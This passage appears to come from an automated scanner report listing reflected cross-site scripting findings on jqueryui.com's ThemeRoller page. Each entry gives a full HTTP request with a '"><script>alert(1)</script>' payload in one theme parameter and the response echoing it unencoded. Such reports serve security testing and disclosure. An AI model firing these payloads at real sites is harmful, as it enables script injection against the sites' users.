GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9510d83"><script>alert(1)</script>440d9262b96&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9510d83"><script>alert(1)</script>440d9262b96&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

3.58. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bb4"><script>alert(1)</script>9e07f5d558 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75e5bb4"><script>alert(1)</script>9e07f5d558&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75e5bb4"><script>alert(1)</script>9e07f5d558&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

3.59. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ffee"><script>alert(1)</script>0861f63f7bc was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556ffee"><script>alert(1)</script>0861f63f7bc&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556ffee"><script>alert(1)</script>0861f63f7bc&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

3.60. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59604"><script>alert(1)</script>34ad975ff8c was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7559604"><script>alert(1)</script>34ad975ff8c&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7559604"><script>alert(1)</script>34ad975ff8c&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

3.61. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf027"><script>alert(1)</script>1e9050619f4 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0cf027"><script>alert(1)</script>1e9050619f4&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0cf027"><script>alert(1)</script>1e9050619f4&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

3.62. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 994f3"><script>alert(1)</script>03809dbf2df was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0994f3"><script>alert(1)</script>03809dbf2df&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0994f3"><script>alert(1)</script>03809dbf2df&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.63. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 882e1"><script>alert(1)</script>07149fc06f1 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png882e1"><script>alert(1)</script>07149fc06f1&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png882e1"><script>alert(1)</script>07149fc06f1&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

3.64. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5322d"><script>alert(1)</script>f5d91b6353c was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png5322d"><script>alert(1)</script>f5d91b6353c&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png5322d"><script>alert(1)</script>f5d91b6353c&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

3.65. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 537a5"><script>alert(1)</script>3b59a1d1c81 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png537a5"><script>alert(1)</script>3b59a1d1c81&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png537a5"><script>alert(1)</script>3b59a1d1c81&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

3.66. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe15"><script>alert(1)</script>b095b5c9bc8 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorH